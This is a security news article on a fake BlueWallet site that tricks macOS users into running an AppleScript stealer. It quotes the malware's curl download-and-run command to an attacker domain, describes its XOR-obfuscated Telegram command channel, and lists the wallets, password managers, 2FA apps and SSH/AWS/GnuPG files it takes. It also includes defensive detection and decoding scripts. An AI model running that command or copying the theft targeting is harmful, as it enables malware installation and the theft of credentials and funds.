Crypto users beware: fake BlueWallet steals crypto coins
Crypto users beware of a fake BlueWallet that steals crypto coins, passwords and accounts on macOS
According to a report published on the official website of Malwarebytes, developer of the popular anti-malware tool, a malware distribution campaign has been posing as the cryptocurrency wallet BlueWallet. The supposed wallet is in fact a decoy: the attackers behind the impersonation use it as an intermediary to drop malware onto the victim's machine, and that malware then steals data and funds from the victim's cryptocurrency wallets, along with other information such as passwords saved on the machine, web browser data, documents stored on the machine and other sensitive information. This campaign specifically targets users of the macOS operating system.
In this campaign the attackers deceive victims through social engineering. They lure victims to a fake BlueWallet website at updating-bluewallet[.]com (the real site is bluewallet[.]io). The site is almost identical to the genuine BlueWallet site, and many people do not notice that it is fake. Without asking for consent, the site downloads a "BlueWallet installer" AppleScript file into the victim's Downloads folder within two seconds of the victim opening the page (it is downloaded again if the victim clicks either of the two buttons shown on the site). The insidious part is that the file is not a typical binary but an AppleScript script, which keeps it from being quarantined by macOS protection.
The first stage of the malware installation starts with the deceptive website telling the victim to open the downloaded script in Script Editor and press the Play (Run) button, or ⌘R, to "open the application". The script claims to install the wallet, but once decoded it is a script that downloads the next malware file (the payload) without the victim's knowledge. The command looks like this:
curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh > /dev/null 2>&1 &
The file is named .sysupd.sh so that it passes as a generic system update file. Once the payload lands on the machine, it issues the umask 077 command so that every file the malware creates is readable only by the compromised user; this prevents other user accounts on the same machine from being used to analyse the malware. The malware runs from a temporary folder under /tmp whose name is generated from /dev/urandom in the configuration section of the script. It also obfuscates its strings, although not as smoothly as other malware: the _xd function reads the hex string two characters at a time and XOR-decodes the resulting bytes one by one with the hardcoded key swckR9JCD2Uu.
This decoding routine recovers the Telegram bot token that serves as the control server (C2, command and control), the chat identifier, a token for a second control channel and URLs used at runtime. The same routine is also used to decode commands received from the bot on Telegram.
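The download-and-run chain quoted above (curl into a hidden file under /tmp, chmod +x, execute with output discarded) is a recognisable pattern in process or shell-history telemetry. The script below is an added detection example written for this article, not code from Malwarebytes or from the malware; it runs over constructed sample command lines (the first mirrors the reported chain with the domain kept defanged, the others are benign or partial lookalikes) and flags commands that both drop a file into a temporary directory and execute it in the same line.

```python
import os
import re

# Constructed sample command lines (not real telemetry from any host). The first
# one mirrors the download-and-run chain quoted in the report, with the domain
# kept defanged; the others are benign or partial lookalikes for comparison.
SAMPLE_COMMANDS = [
    "curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' "
    "-o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh > /dev/null 2>&1 &",
    "curl -sSL https://example.invalid/installer.sh -o /usr/local/bin/tool && chmod +x /usr/local/bin/tool",
    "brew update && brew upgrade",
    "curl -s https://example.invalid/a.sh -o /var/tmp/.cache.sh; chmod 755 /var/tmp/.cache.sh; /var/tmp/.cache.sh",
]

# Temporary directories on macOS; /tmp and /var/tmp are symlinks into /private.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/private/tmp/", "/private/var/tmp/")

# "curl ... -o <path>": capture the output path of the download. The path ends at
# whitespace or a shell separator so "a.sh;" is not captured with the semicolon.
CURL_OUTPUT_RE = re.compile(r"\bcurl\b[^;&|]*?\s-o\s+(?P<path>[^\s;&|]+)")

# Lookahead that ends a path at whitespace, a shell separator or end of line.
END = r"(?=[\s;&|]|$)"


def analyse_command(cmd: str) -> list[str]:
    """Return the suspicious traits found in a single shell command line."""
    traits: list[str] = []
    m = CURL_OUTPUT_RE.search(cmd)
    if not m:
        return traits
    path = m.group("path").strip("'\"")
    traits.append("curl_download")
    if path.startswith(TEMP_DIRS):
        traits.append("download_to_tmp")
    if os.path.basename(path).startswith("."):
        traits.append("hidden_dotfile")
    esc = re.escape(path)
    # chmod +x or an octal mode applied to the file that was just downloaded
    if re.search(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+" + esc + END, cmd):
        traits.append("chmod_exec_on_download")
    # the downloaded path appears as a command (start of line or after ; & |)
    if re.search(r"(?:^|[;&|])\s*" + esc + END, cmd):
        traits.append("executes_download")
    if re.search(r">\s*/dev/null\s+2>&1", cmd):
        traits.append("output_suppressed")
    return traits


def is_drop_and_run(traits: list[str]) -> bool:
    """Alert when a download lands in a temp dir and is executed in the same command."""
    return "download_to_tmp" in traits and "executes_download" in traits


def scan(commands: list[str]) -> list[tuple[str, list[str]]]:
    """Return (command, traits) for every command matching the drop-and-run pattern."""
    results = []
    for cmd in commands:
        traits = analyse_command(cmd)
        if is_drop_and_run(traits):
            results.append((cmd, traits))
    return results


if __name__ == "__main__":
    for cmd, traits in scan(SAMPLE_COMMANDS):
        print("ALERT:", ", ".join(traits))
        print("   ", cmd)
```

The second sample (download to /usr/local/bin and chmod, but no execution) is deliberately left unflagged: plenty of legitimate installers do exactly that, so the alert condition is the combination of a temporary-directory drop with immediate execution, and the remaining traits (hidden dotfile, suppressed output) serve as severity modifiers rather than triggers.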
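For an analyst working through a sample that hides its configuration this way, the decoding step described above (hex pairs XORed against a repeating key) is easy to reproduce outside the malware. The following is an added example written for this article, not the malware's own _xd function or Malwarebytes' tooling: it reimplements the decode, and also shows how a known plaintext prefix such as "https://" recovers the leading key bytes when the key is not yet known. The key is the one quoted in the report; the encoded configuration values are constructed placeholders, not the real C2 values.

```python
from itertools import cycle

# Hardcoded XOR key quoted in the report for this sample.
XOR_KEY = b"swckR9JCD2Uu"


def xor_hex_decode(hex_string: str, key: bytes = XOR_KEY) -> bytes:
    """Read the hex string two characters at a time and XOR each byte with the repeating key."""
    if len(hex_string) % 2 != 0:
        raise ValueError("hex string must contain an even number of characters")
    out = bytearray()
    for i, k in zip(range(0, len(hex_string), 2), cycle(key)):
        out.append(int(hex_string[i:i + 2], 16) ^ k)
    return bytes(out)


def xor_hex_encode(plaintext: bytes, key: bytes = XOR_KEY) -> str:
    """Inverse of xor_hex_decode; used here only to build the constructed sample config."""
    return bytes(b ^ k for b, k in zip(plaintext, cycle(key))).hex()


def recover_key_prefix(hex_string: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery: XOR of ciphertext bytes and plaintext yields the key bytes.

    Useful when the key has not yet been located in the script but a value is known to
    start with a predictable string (a URL scheme, for instance).
    """
    cipher = bytes.fromhex(hex_string[:2 * len(known_plaintext)])
    return bytes(c ^ p for c, p in zip(cipher, known_plaintext))


def decode_config(encoded: dict[str, str], key: bytes = XOR_KEY) -> dict[str, str]:
    """Decode every hex-encoded configuration value into text."""
    return {
        name: xor_hex_decode(value, key).decode("utf-8", errors="replace")
        for name, value in encoded.items()
    }


# Constructed placeholder values (encoded with the key above); NOT the sample's real
# bot token, chat identifier or runtime URL.
SAMPLE_CONFIG = {
    "bot_token": xor_hex_encode(b"0000000000:PLACEHOLDER_BOT_TOKEN"),
    "chat_id": xor_hex_encode(b"-1000000000000"),
    "runtime_url": xor_hex_encode(b"https://c2.example.invalid/api"),
}


if __name__ == "__main__":
    for name, value in decode_config(SAMPLE_CONFIG).items():
        print(f"{name}: {value}")
    print("key prefix from 'https://':", recover_key_prefix(SAMPLE_CONFIG["runtime_url"], b"https://"))
```

Because the key repeats every 12 bytes, a single known URL prefix recovers 8 of the 12 key bytes; a second value with a known prefix of 4 or more bytes, or a longer known plaintext, completes it without locating the key in the script at all.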
The information this malware can steal falls into many categories, such as:
Web browser data, with support for stealing from multiple browsers, e.g.:
- The Chromium family, covering Google Chrome, Brave, Microsoft Edge, Vivaldi, Opera, Opera GX, Arc, Chromium, Coccoc, and Yandex.
- The Firefox family, such as Firefox, Waterfox, Pale Moon, Zen, and LibreWolf.
- macOS's own browser, Safari, from which it can steal cookie files, form data, and history.
Crypto wallets, covering many kinds of wallets such as:
- Desktop wallet applications such as Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.
- Browser-extension wallets such as Xverse, Leather, UniSat, Alby, Wizz, Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, Slope, MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, XDEFI, Keplr, Station, Cosmostation, Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple.
Password manager data, such as:
- 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.
Data from two-factor authentication (2FA) tools, e.g.:
- Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.
Chat applications, such as:
- Telegram Desktop and Discord (including Discord Canary and Discord PTB).
Common browser add-ons, e.g.:
- Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep.
Software development and cloud system files, such as:
- AWS cloud configuration in the .aws directory.
- SSH key files in .ssh.
- GnuPG key files in .gnupg.
- Kubernetes configuration in .kube.
- Shell and Git files: .zshrc, .zsh_history, .bash_history, and .gitconfig.
And general data files on the victim's machine with the following extensions:
- .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env.